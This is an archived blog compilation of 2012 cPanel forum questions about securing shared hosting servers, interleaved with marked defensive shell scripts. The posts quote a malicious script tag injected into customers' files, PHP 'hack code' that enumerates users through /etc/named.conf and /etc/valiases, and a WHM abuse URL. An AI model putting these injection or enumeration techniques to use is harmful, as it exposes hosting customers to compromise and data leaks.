Saturday, 30 June 2012
[Cpanel Blog] disable special php.ini features with suexec June,2012
Hi,
we are using suexec in order to provide each customer with their own php.ini; is there any possibility to prevent the customers from setting safe_mode to off in their php.ini?
Kind regards,
Christian
Posted by Bimo Hery Prabowo at 13.32
[Cpanel Blog] php 5.2.17 security backports question June,2012
Hello,
I run the default apache (2.2.22) and php installation (5.2.17) and installed using easyapache through cpanel/WHM.
Secunia dot com released several security vulnerability notifications today that affect php 5.3x and 5.4x (and presumably 5.2x as well but I could be wrong).
Some of these vulnerabilities were reported today and others about a month ago. Have they already been backported to php 5.2.17 by the cpanel team when installed using easyapache? If not, will they? Or is the only choice to upgrade to the latest version of php 5.3x or 5.4x to be protected against these latest vulnerabilities?
We run many websites and unfortunately trying to get the web developers to update their code to work with php 5.3x and newer is a PITA. I'd still like to run php 5.2x but not if it's going to lead to the server getting rooted through arbitrary code execution vulnerabilities in php 5.2x.
Any info or tips are greatly appreciated.
Thank you!
secunia dot com/advisories/49731/ (CVEs listed here)
secunia dot com/advisories/49014/ (CVEs listed here)
[Cpanel Blog] Using PHP to add a custom security policy June,2012
Hi, I just read http://www.cpanel.net/secpolicy.pdf
I was wondering if it's possible to add a custom security policy using PHP?
The PDF seems to mention Perl only.
Thursday, 28 June 2012
[Cpanel Blog] security problem, php and html files vulnerability June,2012
For 2 days I have had a problem with some accounts on some of my VPSes with cPanel.
I must find and replace a specific string in all accounts; I found this in all PHP and HTML files under some FTP roots:
<script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>
in the first line of every file, and I must run a combination of find and sed commands to remove it.
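The find-and-sed cleanup described in the post above, as an added example that is not part of the original post or of cPanel. It strips the injected tag only when it sits at the very start of line 1 and keeps the rest of that line (injected tags are often prepended to the original first line rather than given a line of their own), saves a .bak copy, and rewrites the file through its existing inode so owner, group and mode are preserved, which matters on a shared host where every file belongs to a customer account. The tag is the one quoted in the post; the file extensions scanned are an assumption.

```shell
#!/bin/sh
# Added example: remove an injected <script> tag from the top of PHP/HTML files.
# INJECTED_TAG is the exact tag quoted in the post; adjust it to what you find.
INJECTED_TAG='<script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>'

# strip_injected_tag FILE
#   If line 1 of FILE starts with the injected tag, remove just the tag: the
#   remainder of line 1 (e.g. "<?php ...") is kept, so original code survives.
#   Writes FILE.bak first, then overwrites FILE through its existing inode so
#   owner, group and mode are unchanged. Returns 0 only if FILE was modified.
strip_injected_tag() {
    f=$1
    first=$(head -n 1 "$f")
    case $first in
        "$INJECTED_TAG"*) rest=${first#"$INJECTED_TAG"} ;;
        *) return 1 ;;
    esac
    cp -p "$f" "$f.bak" || return 2
    {
        [ -n "$rest" ] && printf '%s\n' "$rest"
        tail -n +2 "$f"
    } > "$f.tmp" && cat "$f.tmp" > "$f" && rm -f "$f.tmp"
}

# clean_tree DIR
#   Walks DIR (assumed extensions: .php, .html, .htm) and prints the path of
#   every file that was modified, so you get a per-account list to review.
clean_tree() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) |
    while IFS= read -r f; do
        if strip_injected_tag "$f"; then printf '%s\n' "$f"; fi
    done
}
```

Run it as root against one account first (`clean_tree /home/account/public_html`) and review the printed list before doing the whole server; delete the .bak copies once the sites are verified. Removing the tag only treats the symptom: the account is still writable by whatever planted it until the entry point (stolen FTP credentials, an outdated plugin, a world-writable upload directory) is found.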
[Cpanel Blog] How can I temporarily NULL ROUTE one of my own IPs? June,2012
I am getting hit by a DDOS SYN FLOOD attack on a couple of currently unused IPs that have been configured on my server.
I just want to remove these IPs temporarily, so that no response (e.g. from Apache) is sent out to the remotely connecting IP.
I know I can have my data center NULL ROUTE these IPs for me, but I would rather just do it myself via shell, or in WHM.
Can this be easily accomplished?
Yes, we have CSF and the SYNFLOOD protections switched on, but at this point I would rather just pull the IPs for a while.
By the way, they are hitting port 443 rather than port 80 for some reason.
Thanks for any ideas here!
Tuesday, 26 June 2012
[Cpanel Blog] URGENT: mod_security trivial bypass in versions < 2.6.6 (cpanel uses 2.6.3) June,2012
I've just learnt that there is an exploit in the wild which makes it trivially easy to bypass mod_security in any version prior to 2.6.6.
EasyApache is currently bundling 2.6.3, which is vulnerable.
Can 2.6.6 be included in EasyApache ASAP? And if it's going to take weeks to implement, is there any way we can manually update mod_security to 2.6.6 until EA has it?
Sunday, 24 June 2012
[Cpanel Blog] DNS redirection June,2012
Hello,
I have a question. I have a dedicated server with cPanel, and I want, for example, when someone changes the nameservers of their domain name to my nameservers ns1.myhost.com and ns2.myhost.com, it to show a page, because now it doesn't show anything unless the domain is added as an account.
Thank you
Friday, 22 June 2012
[Cpanel Blog] WHM Attack June,2012
I recently got attacked on my VPS (which is a hosted VPS with WHM / cPanel on it).
I have cphulk active on it and locks them out after 3 attempts but somehow my root password got changed and a customers site had nice "you've been hacked" messages on it.
What can I do to protect WHM / cPanel?
Help!
Wednesday, 20 June 2012
[Cpanel Blog] Pingdom inaccurate results needs whitelisting - firewall rule update error June,2012
Hi,
we use pingdom's free version to monitor whether our site is up/down.
It sometimes gives a series of 'server down' email alerts when the website can actually be reached quite normally.
It would be easy to write it off as a buggy service that gives wrong or inaccurate results, except for the fact that a lot of pingdom users seem to be very happy and sure that pingdom alerts are fairly accurate.
It seems that it is mostly a firewall issue - where if you have blocked an IP range due to some malicious activity from that region, and pingdom happens to have a server in that IP range, it reports a down alert as the ping is blocked.
These are the relevant links I found:
Simple tool to list Pingdom Probe IPs
Automatically update iptables rules for Pingdom monitors. | Personal blog of Chris Ergatides
Automatically update Pingdom firewall rules | MG IT Solutions
However when I tried out the last one - a script named update_pingdom_servers.sh, it gave a series of errors:
Quote:
iptables: Bad rule (does a matching rule exist in that chain?)
iptables: No chain/target/match by that name
We are using csf+lfd as well, and every blacklist entry in cphulkd is also entered into the csf+lfd blacklist manually.
The alternative, as far as I understand would be to manually whitelist the IPs from the pingdom IP feed here: https://my.pingdom.com/probes/feed
Any pointers on how to fix this?
Any help is greatly appreciated.
Thanks in advance,
Dave
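The whitelisting approach mentioned in the post above (feeding the Pingdom probe list into csf), as an added example that is not from the post, the linked scripts, Pingdom or csf. It pulls the IPv4 addresses out of a saved copy of the feed and appends them to csf.allow only when they are not already there, so it can run from cron without growing the file or reloading the firewall for nothing. The feed is assumed to carry each probe address in a <pingdom:ip> element; the sample feed and the addresses in it are constructed.

```shell
#!/bin/sh
# Added example: merge Pingdom probe addresses into csf.allow idempotently.

# extract_probe_ips FEEDFILE
#   Prints one IPv4 address per line, de-duplicated, taken from <pingdom:ip>
#   elements (assumed feed format). Anything that is not a dotted quad is
#   dropped, so a malformed feed cannot push an arbitrary string into the
#   firewall file.
extract_probe_ips() {
    sed -n 's|.*<pingdom:ip>\([0-9.]*\)</pingdom:ip>.*|\1|p' "$1" |
    grep -E '^([0-9]{1,3}\.){3}[0-9]{1,3}$' | sort -u
}

# merge_allow FEEDFILE ALLOWFILE
#   Appends "IP # pingdom probe" for every address not already present as the
#   first field of a line in ALLOWFILE (csf.allow uses "ip # comment" lines).
#   Prints the number of lines added; 0 means nothing changed and csf does not
#   need a reload.
merge_allow() {
    feed=$1 allow=$2
    [ -f "$allow" ] || : > "$allow"
    added=0
    for ip in $(extract_probe_ips "$feed"); do
        if ! awk -v ip="$ip" '$1 == ip { found = 1 } END { exit !found }' "$allow"; then
            printf '%s # pingdom probe\n' "$ip" >> "$allow"
            added=$((added + 1))
        fi
    done
    echo "$added"
}

# Cron-style driver: fetch the feed, merge, reload csf only when something changed.
# Uncomment on a real server (assumes curl and csf are installed):
# curl -fsS https://my.pingdom.com/probes/feed -o /var/tmp/pingdom.xml &&
#   [ "$(merge_allow /var/tmp/pingdom.xml /etc/csf/csf.allow)" -gt 0 ] && csf -r
```

The two iptables messages quoted in the post are what iptables prints when a script runs `iptables -D` for a rule that is not currently loaded, or names a chain or match that does not exist on that box; on a csf server the chains belong to csf, so keep the whitelist in csf.allow and let csf rebuild the rules rather than having a second script edit them directly.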
Saturday, 16 June 2012
[Cpanel Blog] mod_security Ruleset comparisons June,2012
What are cPanel admins' opinions of the various rulesets available for mod_security, and how well do they work on cPanel hosting 11.32 and up?
Which rulesets offer better integration into cPanel?
Is it possible to automatically have the latest rulesets applied?
Are there any caveats for using particular rule sets?
Besides gotroot and the OWASP ModSecurity Core Rule Set, are there other rule sets users would recommend?
[Cpanel Blog] Prevent other apps from sending mail besides exim June,2012
We have exim running on a server and got a notice that a client is sending spam. Unfortunately the mail is not going through exim as far as I can tell and there's nothing in the logs about it as a result.
How can we prevent other scripts that are running perhaps (couldn't find it in the process list currently but maybe they were before) from using outbound port 25? I only want exim to be able to use it.
Friday, 15 June 2012
[Cpanel Blog] Best Anti Virus software for linux centos cPanel/WHM June,2012
Hello,
can you guys let me know the best anti-virus software for Linux CentOS cPanel/WHM?
Please don't suggest ClamAV, it's really poor; recently our client's website got hacked, and I scanned that website to check how many pages were infected, but ClamAV says the website is OK.
[Cpanel Blog] Clients unsuspending suspended locked accounts. June,2012
I have users that are unsuspending accounts at will when I lock and suspend an account.
How do I fix this?
[Cpanel Blog] Notified of compromised account: Where to go from here June,2012
A WordPress site on one of my hosts running WHM 11.32.3 build 19 was listed as a phishing website. I've disabled the account, but I was hoping for advice on where to go from here to try and find as much detail as possible as to how the site was compromised, and how to improve my security to stop it happening in the future, as I have other WordPress sites.
The site admin of the compromised site can be considered AWOL.
Thursday, 14 June 2012
[Cpanel Blog] How to disallow normal user read named.conf file? June,2012
A hacker ran a PHP script on a user account and could list all the domains and users on the same server. I have no evidence showing they can get the password, but it's not good to reveal the user ID.
The script is simple: it gets the domain names from the /etc/named.conf file, then gets the users from /etc/valiases/. I tested with a normal user, but it does not have permission to read the files under /etc/valiases/. How can this PHP script read it?
Thanks for any help.
Code:
    ls -lah /etc/valiases/
    /bin/ls: /etc/valiases/: Permission denied
Hack code snippet:
Code:
    // read the zone list; "@" hides the warning if the file is unreadable
    $d0mains = @file("/etc/named.conf");
Code:
    // fileowner() needs only search (x) permission on /etc/valiases plus a
    // file name, not read permission on the directory, so it succeeds even
    // though "ls" on the directory is denied
    $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
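What makes the snippet in the post above work: the ls output shows the directory is not readable by the user, but fileowner() never reads the directory, it only needs search (x) permission on it plus a name to stat(), and the names come from a world-readable /etc/named.conf. The two functions below are an added example, not from the post or from cPanel. The first classifies what users outside owner and group can do with a directory from its mode bits; the second lists the world-readable regular files directly inside a directory, so walking /etc shows which files hand out names and which directories are traversable but not listable. It relies on GNU stat (with a BSD fallback) and find's -maxdepth; the directories and files it is exercised on are constructed.

```shell
#!/bin/sh
# Added example: audit what users outside owner/group can reach under a directory.

# others_access DIR
#   Prints one word describing the "other" bits of DIR's mode:
#     listable    r and x: names can be enumerated (ls works)
#     traversable x only:  ls is denied, but any name that is guessed or learned
#                          elsewhere can still be stat()ed, opened if its own
#                          mode allows, and passed to fileowner()
#     closed      no x:    nothing below DIR is reachable by path
others_access() {
    mode=$(stat -c %a "$1" 2>/dev/null || stat -f %Lp "$1") || return 2
    o=${mode#"${mode%?}"}            # last octal digit = permissions for "other"
    case $o in
        0|2|4|6) echo closed ;;      # no execute bit
        5|7)     echo listable ;;    # read + execute
        1|3)     echo traversable ;; # execute without read
    esac
}

# world_readable_files DIR
#   Lists regular files directly inside DIR that any user can read (o+r),
#   i.e. the kind of file that leaks names usable inside a traversable directory.
world_readable_files() {
    find "$1" -maxdepth 1 -type f -perm -004
}

# Usage on a cPanel box (read-only, run as root):
#   others_access /etc/valiases
#   world_readable_files /etc | grep named
```

A directory that reports traversable is only as private as the names inside it are secret; once a world-readable file lists those names, the protection is gone, which is the combination the snippet exploits.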
[Cpanel Blog] MySQL vulnerability June,2012
Hello,
oss-sec: Security vulnerability in MySQL/MariaDB sql/password.c
Are the cPanel MySQL binaries vulnerable?
Thank you,
Nibin.
[Cpanel Blog] whm save password June,2012
For those of us who are the only user of our particular computer, having the "save password" makes it difficult to periodically change the password for WHM, especially using the Google Chrome browser. In WHM, there should be a "check box" to "check" to save the password or leave "unchecked" to not save it; this should be an option in the "settings" config, similar to "Allow autocomplete in login screens", perhaps the next line in the WHM settings.
If programmed properly, it SHOULD update the pass that is saved upon login, rather than forcing us to delete all cookies, cache, etc., whenever we would like to change the password, such as after a certain time period or whatever other criteria we utilize to change the password.
Thank you for all the improvements over the years to cPanel & WHM.
[Cpanel Blog] Jailed SSH? June,2012
Hey guys! I'm currently trying out CPanel as I'm thinking about moving from Plesk.
In Plesk I have an option under the settings for an account that says "Chrooted" for SSH access. When choosing this mode the user is jailed to his home directory and can't browse anything below it. Also the commands are very restricted and only allow about 100 of them.
In cPanel I've set the user account to "Jailed Shell" but I don't see any difference really. I have 1257 commands to use, and when logged in as root I have 1279 commands. Also I can browse below my home directory and even list /.
Aren't there any settings to jail the SSH user to a certain number of commands and of course their home directory?
I use GIT to update all my clients on the server so I need SSH access.
Sunday, 10 June 2012
[Cpanel Blog] Comparison of Firewalls June,2012
Hello staff,
In your opinion, what is the best firewall listed below? And Why?
Firewalls: CSF | APF/BFD | FireStarter | Shorewall
If you know any firewall better than the ones mentioned above, post the name for us. :)
[Cpanel Blog] Custom Security Policy June,2012
I need to create a custom security policy: http://www.cpanel.net/secpolicy.pdf
The idea is to block access to WHM only for the users in the wheel group unless they are accessing from a determined IP range.
That way we could avoid potential hacks using the infamous "scripts2/doautofixer?autofix=safesshrestart". (That script nullifies any other security measure taken to avoid undesired connections via SSH.)
Any ideas where to start?
Any "Hello World" security policy?
Regards
--
En Ibague - Comunidad de Ibague - Inicio
[Cpanel Blog] Incomplete SSL Chain problem in Firefox June,2012
I've just rebuilt my server after a disk failure and mostly things have gone smoothly.
When I installed the SSL cert for one of my domains, I used the same procedure as with every other SSL cert I've installed. The server auto-detected the key and the CA bundle just fine and in all browsers except Firefox, the cert loads without error.
For this one site, Firefox reports an invalid certificate chain, and the SSL test at https://www.ssllabs.com/ssltest/index.html reports an incomplete chain.
I've gone to Comodo and downloaded their full CA bundle and installed it. I've checked the Apache config files and it is serving the CA bundle I expect, and I've checked and the CA bundle is identical to other domains on the server with certs from the same provider.
The only difference I can find is that Qualys SSL Labs reports the chain length for a site without this problem as 3 (3788 bytes) and for the site with this problem as 1 (1318 bytes).
What I can't figure out is: where/how is this chain length being specified?
Did I just get a bum cert that needs to be re-issued, or is there some other problem here?
Friday, 8 June 2012
[Cpanel Blog] Single SSL certificate, multiple services + Apache June,2012
Hi,
Done quite a few searches about this, but I do need a confirmation from an expert (where art thou, Tristan?) about a few questions I have:
A) On the "Manage Service SSL Certificates" page: can I install a single purchased certificate, issued for my hostname (host.mydomain.com), on each and every service (Exim, Dovecot, etc.) AND as a shared SSL certificate (which covers SSL for Apache only, I gather)?
B) On the "Install a SSL Certificate and Setup the Domain" page: for the Apache shared SSL certificate, do I set the user to "nobody"?
C) Does the third textarea of the page listed in point B), with the "Paste the ca bundle here (optional)" caption, need to be filled with the Intermediate CA Certificate (I bought a PositiveSSL certificate from Comodo)?
D) Is there any other specific steps outside of these two pages that I should consider to accomplish my goal of eliminating all warnings for my system as a whole?
E) When the certificate renewal comes, what is the least painful way to accomplish it (link welcomed)?
I will consider any human answering these questions as a personal friend to the death or until my server crashes and burns, whichever comes first.
Thanks :-)
[Cpanel Blog] Is cPHulk working properly? June,2012
I'm not sure if cPHulk is working properly or not. Could someone please confirm this for me.
The Logwatch email shows the following attempted attacks. All the IPs have been blocked, but I'm not sure if it's before or after the numbers got so high. I also noticed that the usernames had up to 1323 login attempts but were blocked for two weeks for 30 attempts.
Logwatch email (I've stripped out the IPs)
Failed logins from:
IP1: 333 times
IP2: 1374 times
IP3: 210 times
IP4: 223 times
Illegal users from:
IP1: 3520 times
IP2: 2815 times
IP3: 427 times
IP4: 9948 times
My settings
IP Based Brute Force Protection Period in minutes: 15
Brute Force Protection Period in minutes: 5
Maximum Failures By Account: 15
Maximum Failures Per IP: 10
Maximum Failures Per IP before IP is blocked for two week period: 30
Send a notification upon successful root login when the IP is not whitelisted: off
Extend account lockout time upon additional authentication failures: on
Send notification when brute force user is detected: off
Wednesday, 6 June 2012
[Cpanel Blog] disable cphulk per-account blacklists June,2012
On every server I set up, it always ends within a few days that an indeterminable number of foreign servers have pounded enough on the server login to lock-out the "root" login account (and several others), and continue to do so such that the accounts stay locked indefinitely. Essentially this turns cphulkd into a DDoS assistance toolkit.
I don't mind the idea of blacklisting IP addresses -- there's nothing wrong there. But I need to be able to disable the per-account lockout functionality. I thought that setting "Maximum Failures By Account" to "0" would do this. But it apparently does not -- it instead locks out accounts after the first login failure.
Is there a way to disable the account lockout function? Or do we just have to throw away cphulk completely?
Also, for the love of all that's holy, don't suggest whitelists. It doesn't solve the problem, just pushes it around a little.
[Cpanel Blog] Do I need ipv6 enabled? June,2012
This may be a dumb question, but frankly I do not know the answer. I have always used CSF on my server and have disabled ipv6 as recommended by it.
Now, I am starting to wonder if this was the correct thing to do? Am I preventing others in the world from accessing the domains, email, etc hosted on my server by having ipv6 disabled? Basically I am just wondering if 'people' trying to view my websites, send email to me, etc are being denied access if that makes sense.
- All of my IPs associated with the server are IPv4
- WHM 11.32.2 (build 28)
- CENTOS 5.8 x86_64 standard
Monday, 4 June 2012
[Cpanel Blog] cPanel Security Measures June,2012
Can anyone please guide what security steps are necessary while setting up a new cpanel server? I would like to keep it the most secure for my clients so that they are not affected by exploits in WordPress and other content management systems.
[Cpanel Blog] ...A new self-signed certificate was installed to replace it. June,2012
This morning (June 1) I began getting warning messages when trying to check email that our secure certificate was expired. Since everyone is connecting to SSL ports for email, everyone got the message when trying to do a send/receive and was prevented from doing so until I could reset the cert. This is the message I was sent from WHM:
"The SSL certificate for courier-imapd on server.domain.com expired. A new self-signed certificate was installed to replace it."
"The SSL certificate for courier-pop3d on server.domain.com expired. A new self-signed certificate was installed to replace it."
"If you purchased the expired certificate from a certificate authority, you should replace the self-signed certificate as soon as possible. You can do this using WHM's "Manage Service SSL Certificates" interface: https://server.domain.com:2087/scrip...ageservicecrts (Main >> Service Configuration >> Manage Service SSL Certificates)"
Why did this occur? We use a wildcard cert that doesn't expire until 2015 for all our services located in "Main >> Service Configuration >> Manage Service SSL Certificates" and only the mail related certs were reset by WHM, thankfully, but I would like to know if this can be prevented in the future.
Thanks,
Michael
Saturday, 2 June 2012
[Cpanel Blog] Root was logged into dovecot using following authentication service: system June,2012
Root was logged into dovecot using following authentication service: system
Reverse DNS: r54h244.dixie-net.com
Origin Country: United States (US)
Please use the following links to add to the black list:
Single Ip: https://server.name:2087/cgi/bl.cgi?ip=64.49.54.244
I have swapped mail server selection back to Courier, not sure if they could have done more harm?
Ok, False Alarm it seems, but thousands of access attempts.
Not sure why my firewall didn't stop him in time.
[Cpanel Blog] WHM password only 8 chars long! June,2012
If you set the root whm password to e.g. 1234567890123, you can login even if you type only 12345678 !!!
It seems that characters after the 8th are ignored!
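One well-known cause of the symptom in the post above is the hash format rather than WHM itself: WHM checks the root login against the system password, and a traditional DES crypt(3) hash uses only the first 8 characters of whatever was typed, so "1234567890123" and "12345678" verify identically. The check below is an added example, not from the post or from cPanel: it classifies the hash field of each line of a shadow-format file and lists the accounts that still carry a DES hash. The sample file it is exercised on is constructed; on a real server run it against /etc/shadow as root.

```shell
#!/bin/sh
# Added example: find accounts whose stored password hash is traditional DES.

# hash_scheme HASHFIELD
#   Names the crypt(3) scheme of one /etc/shadow password field. Modern schemes
#   carry a "$id$" prefix; a traditional DES hash has no prefix and is exactly
#   13 characters (2 salt + 11 hash), and DES crypt silently ignores every
#   character of the password after the 8th.
hash_scheme() {
    h=$1
    case $h in
        ''|'!'*|'*'*)     echo locked ;;
        '$1$'*)           echo md5crypt ;;
        '$2'[abxy]'$'*)   echo bcrypt ;;
        '$5$'*)           echo sha256crypt ;;
        '$6$'*)           echo sha512crypt ;;
        '$y$'*|'$7$'*)    echo yescrypt ;;
        '$'*)             echo unknown ;;
        *) if [ ${#h} -eq 13 ]; then echo des; else echo unknown; fi ;;
    esac
}

# des_accounts SHADOWFILE
#   Prints the user name of every account whose hash is DES, i.e. whose
#   effective password is at most 8 characters regardless of what was set.
des_accounts() {
    while IFS=: read -r user hash _; do
        if [ "$(hash_scheme "$hash")" = des ]; then printf '%s\n' "$user"; fi
    done < "$1"
}

# Usage as root:  des_accounts /etc/shadow
```

If root shows up in that list, the fix is to switch the system's password hashing to SHA-512 (`authconfig --passalgo=sha512 --update` on CentOS 5/6, or the ENCRYPT_METHOD setting in /etc/login.defs) and then set the password again, because existing hashes are only rewritten when the password is changed.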